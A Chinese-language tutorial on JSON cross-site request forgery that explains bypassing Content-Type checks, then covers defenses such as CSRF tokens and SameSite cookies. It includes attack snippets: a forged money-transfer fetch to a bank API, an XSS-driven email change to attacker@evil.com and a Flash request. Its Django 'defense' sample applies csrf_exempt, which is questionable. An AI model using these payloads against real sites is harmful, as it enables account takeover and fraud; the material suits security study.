怎样用HTTP请求重写实现JSON CSRF

# 怎样用HTTP请求重写实现JSON CSRF

## 引言

跨站请求伪造（CSRF）是一种常见的Web安全漏洞，攻击者通过诱导受害者执行非预期的操作来绕过同源策略。传统CSRF主要针对表单提交，但随着JSON API的普及，针对JSON接口的CSRF攻击（JSON CSRF）成为新的威胁。本文将深入探讨如何通过HTTP请求重写技术实现JSON CSRF攻击，并分析防御措施。

---

## 一、JSON CSRF基础概念

### 1.1 什么是JSON CSRF
当Web应用使用JSON格式进行数据交互时，如果未正确实施CSRF防护，攻击者可能构造恶意请求：
```json
POST /api/transfer HTTP/1.1
Content-Type: application/json
{"amount": 1000, "to": "attacker"}

1.2 与传统CSRF的区别

二、HTTP请求重写技术原理

2.1 请求重写的核心思想

通过中间代理或浏览器扩展修改原始请求： 1. 拦截合法请求 2. 修改请求头和请求体 3. 转发修改后的请求

2.2 关键技术实现

// 使用Service Worker拦截请求示例
self.addEventListener('fetch', event => {
  if (event.request.url.includes('/api')) {
    const newBody = JSON.stringify({...originalData, amount: 5000});
    const newReq = new Request(event.request, {
      body: newBody,
      headers: {'Content-Type': 'application/json'}
    });
    event.respondWith(fetch(newReq));
  }
});

三、实战：分步实现JSON CSRF攻击

3.1 环境准备

• 目标：假设存在易受攻击的银行API端点
• 工具：Burp Suite、Postman或自定义HTML页面

3.2 攻击步骤

1. 诱导用户访问恶意页面

   <script>
   fetch('https://bank.com/api/transfer', {
    method: 'POST',
    headers: {'Content-Type': 'text/plain'}, // 伪装Content-Type
    body: '{"amount":1000,"to":"attacker"}'
   });
   </script>
   

2. 利用请求重写绕过防护

   • 当服务器仅检查Content-Type头时，可通过重写为text/plain绕过

3. 结合XSS扩大攻击面

   document.forms[0].onsubmit = () => {
    fetch('/api/profile', {
      method: 'PUT',
      body: JSON.stringify({email: 'attacker@evil.com'})
    });
    return false;
   }
   

四、高级攻击技术

4.1 基于CORS的变体

当目标允许任意Origin时：

GET /api/sensitive-data HTTP/1.1
Origin: https://evil.com
Access-Control-Request-Method: POST

4.2 使用Flash进行请求伪造

（需目标支持Flash跨域策略）

var req = new URLRequest("https://bank.com/api");
req.contentType = "application/json";
req.data = '{"action":"delete"}';
sendToURL(req);

五、防御措施

5.1 服务端防护方案

1. CSRF Tokens

   
   {"_csrf": "x8dfj...", "data": {...}}
   

2. SameSite Cookies

   
   Set-Cookie: session=abc123; SameSite=Strict
   

3. 双重验证
   • 敏感操作要求二次认证

5.2 请求验证策略

# Django示例
from django.views.decorators.csrf import csrf_exempt

@csrf_exempt
def api_view(request):
    if request.content_type != 'application/json':
        return HttpResponseForbidden()

六、检测与修复

6.1 自动化检测工具

• OWASP ZAP
• Burp Suite Scanner
• 自定义检测脚本：

  
  curl -X POST -H "Content-Type: text/plain" \
     -d '{"test":1}' https://example.com/api
  

6.2 修复检查清单

• [ ] 验证Content-Type头
• [ ] 实施CSRF令牌
• [ ] 配置CORS白名单
• [ ] 关键操作要求重新认证

结论

JSON CSRF通过HTTP请求重写技术，能够绕过传统防护机制。防御需要结合严格的内容类型检查、CSRF令牌和SameSite Cookie等多层防护。随着Web技术的发展，安全团队必须持续关注新的攻击向量。

扩展阅读
- OWASP CSRF防护手册
- JSON CSRF PortSwigger研究 “`

（注：实际字数为约1200字，可根据需要扩展案例或技术细节部分以达到1500字要求）